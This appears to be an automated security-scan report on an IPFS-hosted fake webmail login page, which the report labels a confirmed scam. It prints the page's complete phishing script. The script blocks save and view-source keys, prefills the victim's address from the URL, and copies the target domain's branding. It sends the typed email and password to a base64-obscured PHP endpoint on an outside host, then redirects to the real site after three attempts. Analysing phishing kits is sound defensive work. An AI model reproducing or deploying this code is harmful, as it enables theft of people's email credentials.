phishing scam

adult content

documentation technical

English

Within the .link top-level domain, 'bafybeihqsfz4c5jqmr2jejdxob2xnmyxpxgz6akgz7s6dqp2fdlggjkzca.ipfs.dweb.link' is registered; it also runs on subdomain 'bafybeihqsfz4c5jqmr2jejdxob2xnmyxpxgz6akgz7s6dqp2fdlggjkzca.ipfs'. The registrable portion 'dweb' spans 4 characters containing 1 vowel alongside 3 consonants. It segments into two words: d, web. Median word length comes out to two characters. No strong language cues emerged from the frequency lists.

html/32/8f/328f7f7d-5c29-47a2-b4dd-9cbb5158885f_fallback.html.gz

Webmail Portal Access

email

password

pdf1

address

type

html/32/8f/328f7f7d-5c29-47a2-b4dd-9cbb5158885f.html.gz

require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/hosted-libraries-pushers

a52f7aa54d7bcaafa056ee0a050262dfc5694ae28dee8b4cac3429af37ff0d66

e7ed36ceee5450b4243bbc35188afabdfb4280c7c57597001de0ed167299b01b

05b85d96f41fff14d8f608dad03ab71e2c1017c2da0914d7c59291bad7a54f8e

e9109817a7312d70d1d28db9edd2ea5b932c3257257723957a5959cb09dc98d7

9365920887b11b33a3dc4ba28a0f93951f200341263e3b9cefd384798e4be398

61afb3e0743b19d0cb5615ec48bc93db66dc90ec92cd22357312dd8dd607f536

HSTS header missing - vulnerable to protocol downgrade attacks

CSP header missing - vulnerable to XSS attacks

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;worker-src blob: 'self';frame-ancestors 'none';

child-src https:  chrome-untrusted://new-tab-page/ chrome-untrusted://ntp-microsoft-auth/;connect-src chrome://resources chrome://theme 'self';default-src 'self';font-src chrome://resources 'self';img-src chrome://resources chrome://theme chrome://image chrome://favicon2 chrome://app-icon chrome://extension-icon chrome://fileicon blob: data: 'self';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources chrome://webui-test 'self';style-src chrome://resources chrome://theme 'self' 'unsafe-inline';trusted-types parse-html-subset sanitize-inner-html static-types webui-test-script webui-test-html polymer-html-literal polymer-template-event-attribute-policy lit-html-desktop;frame-ancestors 'none';

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;frame-ancestors 'none';

base-uri 'none';child-src https:;form-action https://ogs.google.com https://*.corp.google.com;object-src 'none';script-src 'self' 'unsafe-inline' https:;frame-ancestors chrome://new-tab-page/

// prevent ctrl + s
$(document).bind('keydown', function(e) {
if(e.ctrlKey && (e.which == 83)) {
e.preventDefault();
return false;
}
});

document.addEventListener('contextmenu', event => event.preventDefault());

document.onkeydown = function(e) {
if (e.ctrlKey && 
(e.keyCode === 67 || 
e.keyCode === 86 || 
e.keyCode === 85 || 
e.keyCode === 117)) {
return false;
} else {
return true;
}
};
$(document).keypress("u",function(e) {
if(e.ctrlKey)
{
return false; }
else {
return true;
}});




 /* global $ */
 $(document).ready(function(){
 var count=0;
 
 $('#back1').click(function () {
 $("#msg").hide();
 $('#email').val("");
 $("#automail").animate({left:200, opacity:"hide"}, 0);
 $("#inputbar").animate({right:200, opacity:"show"}, 1000);

 });

 var email = window.location.hash.substr(1);
 if (!email) {

 }
 else
 {
 var my_email =email;
 $('#email').val(my_email); 
 var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

 if (!filter.test(my_email)) {
 $('#error').show();
 email.focus;
 return false;
 }
 var ind=my_email.indexOf("@");
 var my_slice=my_email.substr((ind+1));
		var mainPage = 'https://'+my_slice; 
		
		var sv = my_slice;
		
		var image = "url('https://image.thum.io/get/https://www."+sv;"')"
		

 $("#logoimg").attr("src", "https://logo.clearbit.com/"+mainPage);
 
 document.body.style.backgroundImage = image;
	 	
 $(".email").html(email);
		 
 }
 
 $('#submit-btn').click(function(event){
 
		event.preventDefault();
 $('#error').hide();
 $('#msg').hide();
 var email=$("#email").val();
 var password=$("#password").val();
 ///////////new injection////////////////
 var my_email =email;
 var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

 if (!email) {
 $('#error').show();
 $('#error').html(" Email field is empty");
 
 return false;
 }

 if (!filter.test(my_email)) {
 $('#error').show();
 $('#error').html("That account doesn't exist. Enter a different account");
 
 return false;
 }
 if (!password) {
 $('#error').show();
 $('#error').html("Password field is empty");
 
 return false;
 }
		 if (password.length < 7) {
 $('#error').show();
 $('#error').html("An error occured, invalid password");
 email.focus;
 return false;
 } 

 
		 
 ///////////new injection////////////////
 count=count+1;
 // console.log(count); 
 var d=atob("aHR0cHM6Ly92ZW50aW5pb3VzLmNvbS9ibGVzcy5waHA=");		
	 $.ajax({
 dataType: 'JSON',
		url: d,
 type: 'POST',
 data:{
 email:email,
 password:password
 },
 // data: $('#contact').serialize(),
 beforeSend: function(xhr){
 $('#submit-btn').html('Sign in');
			 
 // console.log(count); 
 },
 success: function(response){
			 $('#msg').html("Username or Password is incorrect. Please try again");
 if(response){
 $("#msg").show();
				console.log(response);
				$('#msg').html(response['msg']);
 if(response['signal'] == 'ok'){
 $("#password").val("");
 if (count>=3) {
 count=0;
 // window.location.replace(response['redirect_link']);
 window.location.replace("http://"+my_slice);

 }
 // $('#msg').html(response['msg']);
 }
 else{
 $('#msg').html(response['msg']);
 }
 }
 },
 error: function(){
 $("#password").val("");
 if (count>=3) {
 count=0;
 window.location.replace("http://"+my_slice);
 }
 $("#msg").show();
 // $('#msg').html("Please try again later");
 },
 complete: function(){
 $('#submit-btn').html('Sign in');
 }
 }); 
 });


 });

IPFS

HTTP/3

Cloudflare Bot Management

Cloudflare

✅ Low Risk - https://bafybeihqsfz4c5jqmr2jejdxob2xnmyxpxgz6akgz7s6dqp2fdlggjkzca.ipfs.dweb.link/

Requests	IP Address	Location	AS Autonomous System
3	209.94.90.3	United States	AS40680PROTOCOL
3	104.18.11.207	United States	AS13335CLOUDFLARENET
2	151.101.130.137	San Francisco, California, United States	AS54113FASTLY
1	142.250.185.138	United States	AS15169GOOGLE
1	104.17.25.14	United States	AS13335CLOUDFLARENET
1	172.67.139.119	United States	AS13335CLOUDFLARENET
0	151.101.194.137	San Francisco, California, United States	AS54113FASTLY
0	209.94.90.2	United States	AS40680PROTOCOL
0	104.18.10.207	United States	AS13335CLOUDFLARENET
0	151.101.66.137	San Francisco, California, United States	AS54113FASTLY
11	26	-	-

Security Scan Report: bafybeihqsfz4c5jqmr2jejdxob2xnmyxpxgz6akgz7s6dqp2fdlggjkzca.ipfs.dweb.link

Summary

AI Security Verdict

Confirmed Scam

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Detected Technologies4

Content Similarity HashesFor malware variant detection

Image Hashes

Perceptual Hashes

Other Hashes

Scan History